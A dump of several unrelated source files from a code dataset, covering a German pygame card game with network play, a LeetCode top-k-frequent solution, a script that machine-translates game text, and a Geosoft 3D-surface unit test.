var.hintergrund = pygame.image.load('res/background.jpg')\r\n var.hintergrund = pygame.transform.scale(var.hintergrund, (1366, 768))\r\n \r\n self.endbutton = Button((600, 550, 200, 58), 'Beenden')\r\n\r\n text = 'Warte auf Mitspieler... newline Host: ' + socket.gethostname() + ' newline Port: ' + var.connection[1]\r\n\r\n self.textbox = Textbox((103, 150, 1200, 300), text, 30)\r\n\r\n while var.connect.stopped:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE) or self.endbutton.update(event):\r\n pygame.quit()\r\n var.connect.close()\r\n os._exit(0)\r\n\r\n var.screen.blit(var.hintergrund, (0,0))\r\n\r\n self.endbutton.draw()\r\n self.textbox.draw()\r\n\r\n pygame.display.update()\r\n\r\nclass Overlay:\r\n\r\n def __init__(self):\r\n self.infobox = Textbox((500, 150, 750, 100),'Wähle eine Karte. newline Drücke Spielen, um sie auszuspielen! newline Drücke Weiter, um in die Kaufphase zu gelangen', 25)\r\n\r\n if var.type == 'server':\r\n var.connect = net.Server(int(var.connection[1]))\r\n var.connect.start()\r\n WaitScreen()\r\n var.state = 'action'\r\n cards.createStacklist()\r\n cards.createStacks()\r\n var.connect.send('STACKLIST:' + ' '.join(stack for stack in cards.stacklist))\r\n elif var.type == 'client':\r\n var.connect = net.Client(var.connection[0], int(var.connection[1]))\r\n var.connect.start()\r\n var.state = 'enemy'\r\n self.infobox.setText('Dein Gegner ist am Zug!')\r\n else:\r\n var.connect = net.FakeConnect()\r\n cards.createStacklist()\r\n cards.createStacks()\r\n var.state = 'action'\r\n\r\n var.myplayer = player.Player()\r\n var.interface = None\r\n self.gameover = (False, None)\r\n var.myplayer.clear()\r\n self.handpos = []\r\n\r\n self.weiter = Button((1150, 350, 190, 58), 'Weiter')\r\n self.cardShower = CardShower(cards.Card('Abenteurer'), 'Gegner spielt')\r\n self.stocks = Stocks()\r\n self.board = Board()\r\n self.enemyboard = EnemyBoard()\r\n self.hand = Hand()\r\n self.enemyhand = Hand(enemy=True)\r\n var.hintergrund = pygame.image.load('res/background.jpg')\r\n var.hintergrund = pygame.transform.scale(var.hintergrund, (1366, 768))\r\n\r\n var.interface = HandSelector('single','Spielen', self.playPressed)\r\n\r\n def loop(self):\r\n while True:\r\n self._update()\r\n self._draw()\r\n\r\n # Sieg testen\r\n if var.type == 'server' and cards.gameOver():\r\n var.connect.send('OVER:' + str(var.myplayer.pointsInDeck()))\r\n\r\n if self.gameover[0]:\r\n return (var.myplayer.pointsInDeck(), self.gameover[1])\r\n\r\n def _update(self):\r\n\r\n for event in pygame.event.get():\r\n\r\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):\r\n pygame.quit()\r\n var.connect.close()\r\n os._exit(0)\r\n\r\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:\r\n self.yourTurn()\r\n\r\n if var.state in ['action', 'buy', 'playing']:\r\n if self.weiter.update(event) and var.state != 'playing':\r\n self.weiterPressed()\r\n\r\n if var.state in ['action', 'buy', 'playing', 'react']:\r\n if var.interface is not None:\r\n value = var.interface.update(event)\r\n\r\n if value is not None and (isinstance(var.interface, sys.modules['overlay'].HandSelector) or isinstance(var.interface, HandSelector)):\r\n self.handpos = value\r\n else:\r\n self.handpos = []\r\n\r\n # Connection\r\n var.connect.send('MY_HANDLEN:' + str(len(var.myplayer.hand)))\r\n var.connect.send('MY_NACHZIEHLEN:' + str(len(var.myplayer.nachzieh)))\r\n var.connect.send('MY_STATS:' + str(var.myplayer.actions) + ' ' + str(var.myplayer.buys) + ' ' + str(var.myplayer.money))\r\n var.connect.send('MY_ABLAGELEN:' + str(len(var.myplayer.ablage)))\r\n if len(var.myplayer.ablage) > 0: var.connect.send('MY_ABLAGECARD:' + str(var.myplayer.ablage[-1].name))\r\n else: var.connect.send('MY_ABLAGECARD:None')\r\n\r\n def _draw(self):\r\n\r\n var.screen.blit(var.hintergrund, (0,0))\r\n\r\n if var.state in ['action', 'buy', 'enemy', 'yourturn', 'playing', 'react']:\r\n if var.state != 'playing':\r\n self.weiter.draw()\r\n self.stocks.draw()\r\n self.board.draw()\r\n self.enemyboard.draw()\r\n self.infobox.draw()\r\n\r\n if var.interface is not None:\r\n var.interface.draw()\r\n\r\n self.hand.draw(selected=self.handpos)\r\n self.enemyhand.draw()\r\n\r\n self.cardShower.draw()\r\n\r\n pygame.display.update()\r\n\r\n def weiterPressed(self):\r\n if var.state == 'action':\r\n var.interface = BuySelector('Kaufen', self.buyPressed)\r\n self.infobox.setText('Wähle eine Karte aus dem Vorrat. newline Drücke Kaufen, um sie zu kaufen! newline Drücke Weiter, um den Gegner dranzulassen.')\r\n var.myplayer.playMoney()\r\n var.state = 'buy'\r\n elif var.state == 'buy':\r\n var.interface = HandSelector('single', 'Spielen', self.playPressed)\r\n self.infobox.setText('Dein Gegner ist am Zug!')\r\n var.connect.send('YOUR_TURN')\r\n var.myplayer.clear()\r\n var.state = 'enemy'\r\n\r\n def buyPressed(self, position):\r\n card = self.stocks.getCardOfPos(position)\r\n var.interface.reset()\r\n var.myplayer.buyCard(card)\r\n\r\n def playPressed(self, position):\r\n card = var.myplayer.hand[position[0]]\r\n var.interface.reset()\r\n card.play()\r\n\r\n def yourTurn(self):\r\n var.state = 'action'\r\n self.infobox.setText('Wähle eine Karte. newline Drücke Spielen, um sie auszuspielen! newline Drücke Weiter, um in die Kaufphase zu gelangen')\r\n\r\n def showCard(self, card, text):\r\n self.cardShower.setShow(card, text)\r\n self.cardShower.show()\r\n\r\n def end(self, enemypoints):\r\n self.gameover = True, int(enemypoints)\r\n\r\n\r\nclass End:\r\n\r\n def __init__(self, points):\r\n self.endbutton = Button((550, 550, 300, 58), 'Spiel beenden')\r\n if points[0] > points[1]:\r\n text = 'Du hast gewonnen! newline ' + str(points[0]) + ' Punkte zu ' + str(points[1]) + ' Punkte.'\r\n elif points[0] < points[1]:\r\n text = 'Du hast verloren! newline ' + str(points[0]) + ' Punkte zu ' + str(points[1]) + ' Punkte.'\r\n elif points[0] == points[1]:\r\n text = 'Gleichstand! newline ' + str(points[0]) + ' Punkte zu ' + str(points[1]) + ' Punkte.'\r\n self.textbox = Textbox((103, 100, 1200, 100), text, 30)\r\n\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE) or self.endbutton.update(event):\r\n pygame.quit()\r\n var.connect.close()\r\n os._exit(0)\r\n\r\n var.screen.fill((200,200,200))\r\n\r\n self.endbutton.draw()\r\n self.textbox.draw()\r\n\r\n pygame.display.update()\r\n\r\n\r\nclass Button:\r\n imgpath = ['res/button/button.png', 'res/button/hover.png', 'res/button/click.png']\r\n font = 'res/font.ttf'\r\n\r\n def __init__(self, rect, text):\r\n self.rect = pygame.Rect(rect)\r\n self.text = text\r\n\r\n self.visible = True\r\n self._setImg(0)\r\n self._setText(self.text)\r\n\r\n def _setImg(self, num):\r\n self.img = pygame.image.load(self.imgpath[num])\r\n self.img = pygame.transform.scale(self.img, (self.rect.width, self.rect.height))\r\n\r\n def _setText(self, text):\r\n font = pygame.font.Font(self.font, self.rect.h // 2)\r\n self.textimg = font.render(text, 1, (0, 0, 0))\r\n self.textpos = (self.rect[0] + int(self.rect[2] / 2 - font.size(self.text)[0] / 2),\r\n self.rect[1] + int(self.rect[3] / 2 - font.size(self.text)[1] / 2))\r\n\r\n def draw(self):\r\n if self.visible:\r\n var.screen.blit(self.img, self.rect)\r\n var.screen.blit(self.textimg, self.textpos)\r\n\r\n def update(self, event):\r\n if self.rect.collidepoint(pygame.mouse.get_pos()) and self.visible:\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n self._setImg(2)\r\n elif event.type == pygame.MOUSEBUTTONUP:\r\n self._setImg(0)\r\n return True\r\n else:\r\n self._setImg(1)\r\n else:\r\n self._setImg(0)\r\n return False\r\n\r\n\r\nclass Textbox:\r\n\r\n def __init__(self, rect, text, size):\r\n self.text = text\r\n self.orisize = size\r\n self.size = self.orisize\r\n self.font = pygame.font.Font('res/font.ttf', size)\r\n self.rect = pygame.Rect(rect)\r\n self.visible = True\r\n\r\n def setText(self, text):\r\n self.size = self.orisize\r\n self.text = text\r\n\r\n def draw(self):\r\n self.font = pygame.font.Font('res/font.ttf', self.orisize)\r\n end = False\r\n while not end:\r\n # var.screen.fill(var.hintergrundcolor, rect=self.rect)\r\n end = True\r\n text = self.text.split()\r\n bonusX = 0\r\n extraBonusY = 0\r\n zeile = 0\r\n\r\n self.font = pygame.font.Font('res/font.ttf', self.size)\r\n aktuelle_zeile = []\r\n for word in text:\r\n _word = self.font.render(word + ' ', 1, (0, 0, 0))\r\n\r\n if word == 'newline':\r\n self._draw(aktuelle_zeile)\r\n aktuelle_zeile = []\r\n zeile += 1\r\n extraBonusY += 13\r\n bonusX = 0\r\n else:\r\n if bonusX + _word.get_rect().w + 10 > self.rect.w:\r\n self._draw(aktuelle_zeile)\r\n aktuelle_zeile = []\r\n zeile += 1\r\n bonusX = 0\r\n\r\n x = 10 + self.rect.x + bonusX\r\n y = 10 + self.rect.y + zeile * self.size + extraBonusY\r\n\r\n bonusX += _word.get_rect().w\r\n\r\n if self.size * (zeile + 1) + extraBonusY + 10 >= self.rect.h:\r\n self.visible = False\r\n self.size -= 1\r\n end = False\r\n break\r\n\r\n elif word != 'newline':\r\n aktuelle_zeile.append((_word, x, y))\r\n\r\n self.visible = True\r\n\r\n self._draw(aktuelle_zeile)\r\n\r\n\r\n\r\n def _draw(self, aktuelle_zeile):\r\n if self.visible:\r\n offset = 0\r\n for set in aktuelle_zeile:\r\n offset += set[0].get_rect().w\r\n offset = (self.rect.w - offset) // 2\r\n\r\n for set in aktuelle_zeile:\r\n var.screen.blit(set[0], (set[1] + offset, set[2]))\r\n\r\n\r\nclass TextField:\r\n font = 'res/font.ttf'\r\n\r\n # Konstruktor: surface = worauf wird das TextField gezeichnet, rect = Abmaße\r\n def __init__(self, rect):\r\n self.rect = pygame.Rect(rect)\r\n self.font = pygame.font.Font(self.font, self.rect.h - 10)\r\n self.text = ''\r\n self.writing = False\r\n\r\n def getText(self):\r\n return self.text\r\n\r\n # Zeichnet das Textfeld\r\n def draw(self):\r\n # var.screen.fill((200,200,200), rect=self.rect)\r\n text = self.font.render(self.text, 1, (0,0,0))\r\n var.screen.blit(text, (self.rect.x + 7, self.rect.y + 7))\r\n var.screen.fill((0, 0, 0), rect=(self.rect.x, self.rect.y + self.rect.h + 10, self.rect.w - 20, 4))\r\n if self.writing:\r\n var.screen.fill((0, 0, 0), rect=[self.rect.x + self.font.size(self.text)[0], self.rect.y, 4, self.rect.h + 7])\r\n\r\n # Muss mit event aufgerufen werden, damit das Textfeld funktioniert\r\n def update(self, event):\r\n\r\n if self.rect.collidepoint(pygame.mouse.get_pos()) and event.type == pygame.MOUSEBUTTONDOWN:\r\n self.writing = True\r\n elif not self.rect.collidepoint(pygame.mouse.get_pos()) and event.type == pygame.MOUSEBUTTONDOWN:\r\n self.writing = False\r\n\r\n if self.writing:\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_BACKSPACE:\r\n self.text = self.text[:-1]\r\n elif event.key <= 127 and self.font.size(self.text)[0] <= self.rect.w - 40:\r\n self.text += event.unicode\r\n self.draw()\r\n\r\n\r\nclass Label:\r\n font = 'res/font.ttf'\r\n\r\n def __init__(self, rect, text):\r\n self.rect = pygame.Rect(rect)\r\n self.text = text\r\n\r\n self.visible = True\r\n self.setText(self.text)\r\n\r\n def setText(self, text):\r\n self.text = text\r\n font = pygame.font.Font(self.font, self.rect.height)\r\n self.img = font.render(self.text, 1, (0, 0, 0))\r\n\r\n def draw(self):\r\n var.screen.blit(self.img, self.rect)\r\n\r\n\r\nclass Stack:\r\n\r\n def __init__(self, pos, card):\r\n self.card = card\r\n self.pos = pos\r\n self.label = Label((27 + pos[0], 120 + pos[1], 20, 20), '')\r\n self.setCard(card)\r\n\r\n def setCard(self, card):\r\n self.card = card\r\n self.img = pygame.image.load(self.card.path)\r\n self.img = pygame.transform.scale(self.img, (80, 120))\r\n\r\n def _drawCard(self):\r\n var.screen.blit(self.img, (self.pos[0], self.pos[1]))\r\n\r\n def _drawCounter(self, count):\r\n self.label.setText('x' + str(count))\r\n self.label.draw()\r\n\r\n def draw(self, count):\r\n if count > 0:\r\n self._drawCard()\r\n self._drawCounter(count)\r\n\r\n\r\nclass Stocks:\r\n\r\n def __init__(self):\r\n self.stacklist = (('Kupfer', 'Silber', 'Gold'), ('Anwesen', 'Herzogtum', 'Provinz', 'Fluch'), cards.stacklist[0:4], cards.stacklist[4:8], cards.stacklist[8:10])\r\n self.stacks = [Stack((20 + 90 * x, 10 + 150 * y), cards.Card(self.stacklist[y][x])) for y, row in enumerate(self.stacklist) for x, card in enumerate(row)]\r\n\r\n def getCardOfPos(self, position):\r\n return cards.Card(self.stacklist[position[1]][position[0]])\r\n\r\n def draw(self):\r\n for stack in self.stacks:\r\n stack.draw(cards.stacks[stack.card.name])\r\n\r\n\r\nclass CardShower:\r\n\r\n def __init__(self, card, text):\r\n self.card = card\r\n self.label = Label((790, 180, 100, 30), text)\r\n self.setShow(card, text)\r\n self.visible = False\r\n\r\n def setShow(self, card, text):\r\n self.card = card\r\n self.img = pygame.image.load(card.path)\r\n self.img = pygame.transform.scale(self.img, (200,300))\r\n self.label.setText(text)\r\n\r\n def hide(self):\r\n self.visible = False\r\n\r\n def show(self):\r\n self.visible = True\r\n Waitor(1, self.hide)\r\n\r\n def showUntimed(self):\r\n self.visible = True\r\n\r\n def draw(self):\r\n if self.visible:\r\n var.screen.fill((170,170,170), rect=(763, 160, 250, 395))\r\n self.label.draw()\r\n var.screen.blit(self.img, (790, 230))\r\n\r\n\r\nclass Board:\r\n\r\n def __init__(self):\r\n self.backside = pygame.image.load('res/karten/rueckseite.png')\r\n self.rightcounter = Label((1300, 700, 30, 30), '')\r\n self.leftcounter = Label((500, 700, 30, 30), '')\r\n self.aktionen = Label((400, 650, 100, 20), 'Aktionen: 1')\r\n self.kaeufe = Label((400, 680, 100, 20), 'Käufe: 1')\r\n self.geld = Label((400, 710, 100, 20), 'Geld: 0')\r\n\r\n def draw(self):\r\n if (len(var.myplayer.nachzieh) > 0):\r\n var.screen.blit(self.backside, (550, 565))\r\n text = str(len(var.myplayer.nachzieh)) + ' x'\r\n self.leftcounter.setText(text)\r\n self.leftcounter.draw()\r\n\r\n if(len(var.myplayer.ablage) > 0):\r\n img = pygame.image.load(var.myplayer.ablage[-1].path)\r\n var.screen.blit(img, (1150, 555))\r\n text = 'x' + str(len(var.myplayer.ablage))\r\n self.rightcounter.setText(text)\r\n self.rightcounter.draw()\r\n\r\n self.aktionen.setText('Aktionen: ' + str(var.myplayer.actions))\r\n self.kaeufe.setText('Käufe: ' + str(var.myplayer.buys))\r\n self.geld.setText('Geld: ' + str(var.myplayer.money))\r\n self.aktionen.draw()\r\n self.kaeufe.draw()\r\n self.geld.draw()\r\n\r\n for i, card in enumerate(var.myplayer.auslage):\r\n img = pygame.image.load(card.path)\r\n var.screen.blit(img, (550 + i * 50, 300))\r\n\r\n\r\nclass EnemyBoard:\r\n\r\n def __init__(self):\r\n self.backside = pygame.image.load('res/karten/rueckseite.png')\r\n self.rightcounter = Label((1300, 50, 30, 30), '')\r\n self.leftcounter = Label((500, 50, 30, 30), '')\r\n self.aktionen = Label((400, 0, 100, 20), 'Aktionen: 1')\r\n self.kaeufe = Label((400, 30, 100, 20), 'Käufe: 1')\r\n self.geld = Label((400, 60, 100, 20), 'Geld: 0')\r\n\r\n def draw(self):\r\n if (var.enemynachziehlen > 0):\r\n var.screen.blit(self.backside, (550, -100))\r\n text = str(var.enemynachziehlen) + ' x'\r\n self.leftcounter.setText(text)\r\n self.leftcounter.draw()\r\n\r\n if (var.enemyablagelen > 0) and var.enemyablagecard is not None:\r\n img = pygame.image.load(var.enemyablagecard.path)\r\n var.screen.blit(img, (1150, -100))\r\n text = 'x' + str(var.enemyablagelen)\r\n self.rightcounter.setText(text)\r\n self.rightcounter.draw()\r\n\r\n self.aktionen.setText('Aktionen: ' + str(var.enemystats[0]))\r\n self.kaeufe.setText('Käufe: ' + str(var.enemystats[1]))\r\n self.geld.setText('Geld: ' + str(var.enemystats[2]))\r\n self.aktionen.draw()\r\n self.kaeufe.draw()\r\n self.geld.draw()\r\n\r\n\r\nclass Hand:\r\n\r\n def __init__(self, enemy=False):\r\n self.enemy = enemy\r\n if self.enemy:\r\n self.location = (850, -170)\r\n else:\r\n self.location = (850, 650)\r\n self.rahmen = pygame.image.load('res/karten/rahmen.png')\r\n\r\n def draw(self, selected=()):\r\n places = []\r\n if self.enemy:\r\n hand = [None] * var.enemyhandlen\r\n else:\r\n hand = var.myplayer.hand\r\n\r\n if len(hand) == 0:\r\n return\r\n elif len(hand) == 1:\r\n if self.enemy:\r\n img = pygame.image.load('res/karten/rueckseite.png')\r\n places = [(img, 850, -100, 0)]\r\n else:\r\n img = pygame.image.load(hand[0].path)\r\n places = [(img, 850, 560, 0)]\r\n else:\r\n for i, card in enumerate(hand):\r\n rot = + 35 - (70 * i) // (len(hand) - 1)\r\n if self.enemy:\r\n img = pygame.image.load('res/karten/rueckseite.png')\r\n rot *= -1\r\n else:\r\n img = pygame.image.load(card.path)\r\n\r\n rotimg = pygame.transform.rotate(img, rot)\r\n x = - 100 + (200 * i) // (len(hand) - 1)\r\n y = math.sqrt(150 ** 2 - x ** 2) // 2\r\n if self.enemy:\r\n y *= -1\r\n location = rotimg.get_rect(center=img.get_rect().center).move(x + self.location[0], self.location[1] - y)\r\n set = (rotimg, location[0], location[1], rot)\r\n places.append(set)\r\n\r\n for i,set in enumerate(places):\r\n var.screen.blit(set[0], (set[1], set[2]))\r\n\r\n if selected != [] and i in selected:\r\n rahmen = pygame.transform.rotate(self.rahmen, places[i][3])\r\n var.screen.blit(rahmen, (places[i][1], places[i][2]))\r\n\r\n\r\nclass HandSelector:\r\n\r\n def __init__(self, type, text, callback):\r\n self.type = type\r\n self.positions = []\r\n self.callback = callback\r\n self.button = Button((1150, 440, 190, 58), text)\r\n self.places = []\r\n\r\n def reset(self):\r\n self.positions = []\r\n\r\n def update(self, event):\r\n\r\n places = []\r\n if len(var.myplayer.hand) == 1:\r\n places = [(var.myplayer.hand[0], 0, 850, 560)]\r\n else:\r\n for i, card in enumerate(var.myplayer.hand):\r\n rot = 35 - (70 * i) // (len(var.myplayer.hand) - 1)\r\n img = pygame.image.load('res/karten/mask.png')\r\n rotimg = pygame.transform.rotate(img, rot)\r\n x = - 100 + (200 * i) // (len(var.myplayer.hand) - 1)\r\n y = math.sqrt(150 ** 2 - x ** 2) // 2\r\n location = rotimg.get_rect(center=img.get_rect().center).move(x + 850, 650 - y)\r\n set = (rotimg, location[0], location[1], rot)\r\n places.append(set)\r\n self.places = places\r\n\r\n position = None\r\n\r\n for i, set in enumerate(places):\r\n rect = set[0].get_rect().move(set[1], set[2])\r\n pixel = [pygame.mouse.get_pos()[0] - set[1], pygame.mouse.get_pos()[1] - set[2]]\r\n if event.type == pygame.MOUSEBUTTONUP and rect.collidepoint(pygame.mouse.get_pos()) and set[0].get_at(pixel) == (255,255,255, 255):\r\n if self.type == 'single':\r\n self.positions = [i]\r\n elif self.type == 'multiple':\r\n position = i\r\n\r\n if self.type == 'multiple':\r\n if position in self.positions:\r\n self.positions.remove(position)\r\n elif position is not None:\r\n self.positions.append(position)\r\n\r\n if self.button.update(event) and self.positions != []:\r\n self.callback(self.positions)\r\n\r\n return self.positions\r\n\r\n def draw(self):\r\n self.button.draw()\r\n\r\n\r\nclass BuySelector:\r\n\r\n def __init__(self, text, callback):\r\n self.position = None\r\n self.callback = callback\r\n self.button = Button((1150, 440, 190, 58), text)\r\n self.img = pygame.image.load('res/karten/rahmen.png')\r\n self.img = pygame.transform.scale(self.img, (80, 120))\r\n\r\n def reset(self):\r\n self.position = None\r\n\r\n def update(self, event):\r\n for x in range(4):\r\n for y in range(5):\r\n rect = pygame.Rect([20 + x * 90, 10 + 150 * y, 80, 120])\r\n if rect.collidepoint(pygame.mouse.get_pos()) and event.type == pygame.MOUSEBUTTONUP and not (x,y) in [(3,0), (2,4), (3,4)] and cards.stacks[var.overlay.stocks.getCardOfPos((x,y)).name] > 0:\r\n self.position = x,y\r\n if self.button.update(event) and self.position is not None:\r\n self.callback(self.position)\r\n\r\n def draw(self):\r\n self.button.draw()\r\n if self.position is not None:\r\n var.screen.blit(self.img, [20 + self.position[0] * 90, 10 + 150 * self.position[1], 80, 120])\r\n\r\n\r\nclass TwoOptionsSelector:\r\n\r\n def __init__(self, text, options, callback, pos=(790, 180)):\r\n self.pos = pos\r\n self.callback = callback\r\n self.label = Label((pos[0], pos[1], 250, 20), text)\r\n self.option1 = Button((pos[0], pos[1] + 50, 120, 40), options[0])\r\n self.option2 = Button((pos[0] + 130, pos[1] + 50, 120, 40), options[1])\r\n\r\n def update(self, event):\r\n if self.option1.update(event):\r\n self.callback(True)\r\n elif self.option2.update(event):\r\n self.callback(False)\r\n\r\n def draw(self):\r\n var.screen.fill((170, 170, 170), rect=(self.pos[0] - 27, self.pos[1]-20, 300, 125))\r\n self.label.draw()\r\n self.option1.draw()\r\n self.option2.draw()\r\n\r\n\r\nclass Waitor(threading.Thread):\r\n def __init__(self, time, callback):\r\n threading.Thread.__init__(self)\r\n self.time = time\r\n self.callback = callback\r\n self.start()\r\n\r\n def run(self):\r\n time.sleep(self.time)\r\n self.callback()\r\n\r\ndef main():\r\n pygame.init()\r\n pygame.display.set_caption('Dominion 2.0')\r\n pygame.display.set_icon(pygame.image.load('res/logo.png'))\r\n var.screen = pygame.display.set_mode((1366, 768))\r\n\r\n Menu()\r\n var.overlay = Overlay()\r\n points = var.overlay.loop()\r\n End(points)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"overlay.pyw","file_name":"overlay.pyw","file_ext":"pyw","file_size_in_byte":27201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"139995196","text":"class Solution:\n def topKFrequent(self, nums: List[int], k: int) -> List[int]:\n #22.02 0509\n d={}\n for c in nums:\n d[c]=d.get(c,0)+1\n cnt=sorted(d.values())[-k:]#前k出现的次数\n return [i for i in d if d[i] in cnt ] \n \n'''给定一个非空的整数数组,返回其中出现频率前 k 高的元素。\n\n示例 1:\n\n输入: nums = [1,1,1,2,2,3], k = 2\n输出: [1,2]\n示例 2:\n\n输入: nums = [1], k = 1\n输出: [1]\n说明:'''","sub_path":"leetcode_solution/leetcode类别/4堆median/中等/347 前 K 个高频元素.py","file_name":"347 前 K 个高频元素.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"113718805","text":"import os\nimport json\nimport random\nimport re\n#import googletrans\nfrom time import sleep\nfrom configparser import ConfigParser\nimport translate\nfrom html import unescape\n\n#translator = googletrans.Translator(service_urls=[\"translate.googleapis.com\"])\n\n\ndef translate_text(text: str):\n \"\"\"\n Translates jp text into en text and returns it as a string\n\n Args:\n text (str): jp text to translate\n\n Returns:\n [type]: en translated text\n\n Raises:\n Exception: if failed to encode or translate text\n \"\"\"\n try:\n # Contains cjk?\n if not re.search(u\"[\\u3040-\\u30ff\\u3400-\\u4dbf\\u4e00-\\u9fff\\uf900-\\ufaff\\uff66-\\uff9f]\", text):\n raise ValueError(\"no cjk\")\n #translated = translator.translate(text, \"en\", \"ja\").text\n translated = unescape(translator.translate(text))\n # Check if cp932 encodable\n translated.encode(\"cp932\")\n return translated\n except Exception as e:\n print(e)\n print(f\"Failed to translate {text}\")\n return text\n\n\ndef file_exists(file: str) -> bool:\n \"\"\"\n Checks if file exists\n\n Args:\n file (str): location of file to check in current directory\n\n Returns:\n [bool]: if exists\n \"\"\"\n return os.path.isfile(file)\n\n\ndef machine_translate_list(data: dict):\n new_data = {}\n for file in data:\n new_data[file] = []\n for i, string in enumerate(data[file], start=1):\n translated = translate_text(string)\n sleep_time = random.uniform(4, 8)\n new_data[file].append(translated)\n print(f\"File: {file}, Old: {repr(string)}, New: {repr(translated)}, Done {i}/{len(data[file])}, Sleeping for {round(sleep_time, 2)}s\")\n sleep(sleep_time)\n return new_data\n\n\ndef machine_translate_single(file_name: str, data: dict):\n new_data = {}\n for i, file in enumerate(data):\n translated = translate_text(data[file])\n sleep_time = random.uniform(4, 8)\n new_data[file] = translated\n print(f\"File: {file_name}, Old: {repr(data[file])}, New: {repr(translated)}, Done {i}/{len(data)}, Sleeping for {round(sleep_time, 2)}s\")\n sleep(sleep_time)\n return new_data\n\n\ndef translate_text_files():\n # Check if already exists\n if file_exists(\"translated_text.json\"):\n print(\"Skipping translated_text.json, already done.\")\n return\n\n with open(\"dumped_text.json\", \"r\", encoding=\"cp932\") as f:\n data = json.load(f)\n\n new_data = machine_translate_list(data)\n\n with open(\"translated_text.json\", \"w\", encoding=\"cp932\") as f:\n json.dump(new_data, f, indent=4)\n\n\ndef translate_helptext_file():\n # Check if already exists\n if file_exists(\"translated_helptext.json\"):\n print(\"Skipping translated_helptext.json, already done.\")\n return\n\n with open(\"dumped_helptext.json\", \"r\", encoding=\"cp932\") as f:\n data = json.load(f)\n\n new_data = machine_translate_single(\"HelpText.bin\", data)\n\n with open(\"translated_helptext.json\", \"w\", encoding=\"cp932\") as f:\n json.dump(new_data, f, indent=4)\n\n\ndef translate_tutorial_file():\n # Check if already exists\n if file_exists(\"translated_tutorial.json\"):\n print(\"Skipping translated_tutorial.json, already done.\")\n return\n\n with open(\"dumped_tutorial.json\", \"r\", encoding=\"cp932\") as f:\n data = json.load(f)\n\n new_data = machine_translate_single(\"Tutorial.bin\", data)\n\n with open(\"translated_tutorial.json\", \"w\", encoding=\"cp932\") as f:\n json.dump(new_data, f, indent=4)\n\n\ndef translate_scripts():\n for root, _, files in os.walk(\"scripts\"):\n for name in files:\n fp = os.path.join(root, name)\n config = ConfigParser()\n modified = False\n with open(fp, \"r\", encoding=\"cp932\") as f:\n config.read_file(f)\n if int(config[\"data\"][\"translated\"]) == 0:\n for i, string in enumerate(config[\"strings\"]):\n s = config[\"strings\"][string]\n if s:\n t = random.uniform(3, 7)\n translated = translate_text(s)\n config[\"strings\"][string] = translated\n print(f\"File: {name}, Old: {repr(s)}, New: {repr(translated)}, Done {i}/{len(config['strings'])}, Sleeping for {round(t, 2)}s\")\n sleep(t)\n config[\"data\"][\"translated\"] = \"1\"\n modified = True\n if modified:\n with open(fp, \"w\", encoding=\"cp932\") as f:\n config.write(f)\n\n\nif __name__ == \"__main__\":\n # Machine translate dumped text/ files\n translate_text_files()\n\n # Machine translate dumped help/HelpText.bin file\n translate_helptext_file()\n\n # Machine translate dumped tutorial/Tutorial.bin file\n translate_tutorial_file()\n\n # Machine translate scripts\n translate_scripts()\n","sub_path":"machine_translate.py","file_name":"machine_translate.py","file_ext":"py","file_size_in_byte":4981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"571932285","text":"import unittest\nimport geosoft.gxapi as gxapi\nimport numpy as np\nimport geosoft.gxpy.view as gxv\nimport geosoft.gxpy.group as gxg\nimport geosoft.gxpy.vv as gxvv\n\nfrom base import GXAPITest\n\n\nclass Test(GXAPITest):\n\n @classmethod\n def setUpClass(cls):\n cls.setUpGXAPITest()\n\n # @unittest.skip('WIP – see issue #13 https://github.com/GeosoftInc/gxapi/issues/13')\n def test_draw_surface_3d(self):\n\n verts = np.array([[0, 0, 0],\n [5, 0, 0],\n [5, 5, 0],\n [0, 3, 5],\n [2.5, 2, 10],\n [-3, 6, 8],\n [-4, 0, 12]], dtype=np.float64)\n faces = np.array([[0, 1, 2],\n [0, 2, 3],\n [3, 2, 4],\n [1, 2, 4],\n [3, 4, 5],\n [6, 4, 5]], dtype=np.int32)\n\n with gxv.View_3d.new() as v3d:\n v3d_file = v3d.file_name\n with gxg.Draw_3d(v3d, 'Surface') as g:\n verts = verts[faces].reshape(-1, 3)\n vx, vy, vz = gxvv.vvset_from_np(verts)\n vf1, vf2, vf3 = gxvv.vvset_from_np(faces)\n normals = gxg.vertex_normals_np(faces, verts)\n nx, ny, nz = gxvv.vvset_from_np(normals[faces].reshape(-1, 3))\n\n # using a constant color does not complain\n v3d.gxview.draw_surface_3d_ex('test',\n vx.gxvv, vy.gxvv, vz.gxvv,\n nx.gxvv, ny.gxvv, nz.gxvv,\n gxapi.GXVV.null(), gxg.C_GREY,\n vf1.gxvv, vf2.gxvv, vf3.gxvv,\n v3d.coordinate_system.gxipj)\n\n # using an array color raises invalid number of colour if we pass colours/vertex\n color = np.array([gxg.C_GREY for i in range(vx.length)])\n color_vv = gxvv.GXvv(color, dtype=np.int32)\n try:\n v3d.gxview.draw_surface_3d_ex('test2',\n vx.gxvv, vy.gxvv, vz.gxvv,\n nx.gxvv, ny.gxvv, nz.gxvv,\n color_vv.gxvv, gxg.C_GREY,\n vf1.gxvv, vf2.gxvv, vf3.gxvv,\n v3d.coordinate_system.gxipj)\n\n except gxapi.GXAPIError as e:\n print(str(e))\n\n # and if pass colours/face it asserts\n color = np.array([gxg.C_GREY for i in range(faces.shape[0])])\n color_vv = gxvv.GXvv(color, dtype=np.int32)\n v3d.gxview.draw_surface_3d_ex('test2',\n vx.gxvv, vy.gxvv, vz.gxvv,\n nx.gxvv, ny.gxvv, nz.gxvv,\n color_vv.gxvv, gxg.C_GREY,\n vf1.gxvv, vf2.gxvv, vf3.gxvv,\n v3d.coordinate_system.gxipj)\n\n\n###############################################################################################\n\nif __name__ == 